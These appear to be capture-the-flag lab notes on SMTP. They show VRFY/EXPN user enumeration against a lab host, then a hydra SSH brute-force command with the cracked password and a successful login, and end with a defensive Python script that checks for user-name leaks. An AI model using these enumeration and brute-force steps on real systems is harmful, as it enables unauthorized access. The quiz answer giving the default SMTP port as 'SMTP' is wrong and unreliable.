# SMTP

###### tags: `network` `service`

Simple Mail Transfer Protocol

# Working

![](https://i.imgur.com/i9mJK8Z.png)

## Protocol

- SMTP

Where the email ultimately ends up:

- POP (Post Office Protocol)
- IMAP (Internet Message Access Protocol)

SMTP together with POP/IMAP allows the user to send outgoing mail and retrieve incoming mail, respectively.

# Enumerate

## server detail

### Metasploit

The "_smtp_version_" module scans a range of IP addresses and determines the version of any mail servers it encounters.

![](https://i.imgur.com/2vly1Hp.png)

MTA -> Postfix

MTA to MTA

Postfix (ESMTP) is free, open-source mail server software. ESMTP is a protocol for sending mail more efficiently and securely, and Postfix is mail server software that implements this protocol.

## User from SMTP

### Manual

SMTP commands (connected using telnet):

-> VRFY (confirms the names of valid users)
-> EXPN (mailing lists): shows users' mail addresses and e-mail lists

## Using Metasploit

"_smtp_enum_" module

![](https://i.imgur.com/l63SdYE.png)

```
10.10.57.11:25 Users found: , _apt, administrator, backup, bin, daemon, dnsmasq, games, gnats, irc, landscape, list, lp, lxd, mail, man, messagebus, news, nobody, pollinate, postfix, postmaster, proxy, sshd, sync, sys, syslog, systemd-network, systemd-resolve, systemd-timesync, uucp, uuidd, www-data
```

```
echo "10.10.57.11:25 Users found: , _apt, administrator, backup, bin, daemon, dnsmasq, games, gnats, irc, landscape, list, lp, lxd, mail, man, messagebus, news, nobody, pollinate, postfix, postmaster, proxy, sshd, sync, sys, syslog, systemd-network, systemd-resolve, systemd-timesync, uucp, uuidd, www-data" | tr ',' '\n' >> mailUser
```

```
10.10.57.11:25 Users found:
_apt
administrator
backup
bin
daemon
dnsmasq
games
gnats
irc
landscape
list
lp
lxd
mail
man
messagebus
news
nobody
pollinate
postfix
postmaster
proxy
sshd
sync
sys
syslog
systemd-network
systemd-resolve
systemd-timesync
uucp
uuidd
www-data
```

## Alternate tools

```
smtp-user-enum
```

https://www.kali.org/tools/smtp-user-enum/

```
Examples:

$ smtp-user-enum -M VRFY -U users.txt -t 10.0.0.1
$ smtp-user-enum -M EXPN -u admin1 -t 10.0.0.1
$ smtp-user-enum -M RCPT -U users.txt -T mail-server-ips.txt
$ smtp-user-enum -M EXPN -D example.com -U users.txt -t 10.0.0.1
```

# Exploit

info

- username: administrator
- password: ?
- port 22 is open

Try to log in using hydra:

```
hydra -t 16 -l administrator -f -P ../../../wordlists/rockyou.txt -vV 10.10.57.11 ssh
```

![](https://i.imgur.com/sOktZzQ.png)

Password: alejandro

![](https://i.imgur.com/5a7Eu5C.png)

Login success.

---

Question

What is the first step in the SMTP process?

SMTP handshake

---

What is the default SMTP port?

SMTP

---

Where does the SMTP server send the email if the recipient's server is not available?

SMTP queue

---

On what server does the Email ultimately end up on?

POP/IMAP

---

# Reference

https://computer.howstuffworks.com/e-mail-messaging/email3.htm
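
The VRFY/EXPN enumeration under "User from SMTP" only works when the server answers a real account differently from a made-up one. The following is an added example (not part of the original notes) of a check a mail administrator can run against their own server to see whether that difference exists; the function names and the sample reply codes are assumptions constructed for illustration.

```python
import smtplib

# Reply classes per RFC 5321: 250/251 confirm a mailbox, 550/551/553 reject it.
# Anything else (252 "cannot VRFY", 502 "command disabled", ...) says nothing
# by itself about whether the name exists.
CONFIRM = {250, 251}
REJECT = {550, 551, 553}


def classify(code):
    if code in CONFIRM:
        return "confirms"
    if code in REJECT:
        return "rejects"
    return "opaque"


def leaks_users(known_code, bogus_code):
    """True when a real account and a made-up one get distinguishable replies."""
    return classify(known_code) != classify(bogus_code)


def audit(replies):
    """replies: {command: (code_for_known_user, code_for_bogus_user)}.
    Returns the commands that let a client tell valid names from invalid ones."""
    return sorted(cmd for cmd, (known, bogus) in replies.items()
                  if leaks_users(known, bogus))


def probe(host, known, bogus, port=25):
    """Collect live replies from a server you administer (needs network access)."""
    with smtplib.SMTP(host, port, timeout=10) as smtp:
        smtp.ehlo_or_helo_if_needed()
        return {
            "VRFY": (smtp.verify(known)[0], smtp.verify(bogus)[0]),
            "EXPN": (smtp.expn(known)[0], smtp.expn(bogus)[0]),
        }


# Constructed reply codes (not captured from the host in these notes).
BEFORE = {"VRFY": (252, 550), "EXPN": (502, 502)}   # VRFY replies differ
AFTER = {"VRFY": (502, 502), "EXPN": (502, 502)}    # both commands refused

if __name__ == "__main__":
    print("before:", audit(BEFORE))
    print("after: ", audit(AFTER))
```

The `AFTER` case models a server that refuses both commands, for example Postfix with `disable_vrfy_command = yes`. Note that a 252 reply still leaks when unknown names get 550, which is why the check compares the two replies instead of looking for 250 alone.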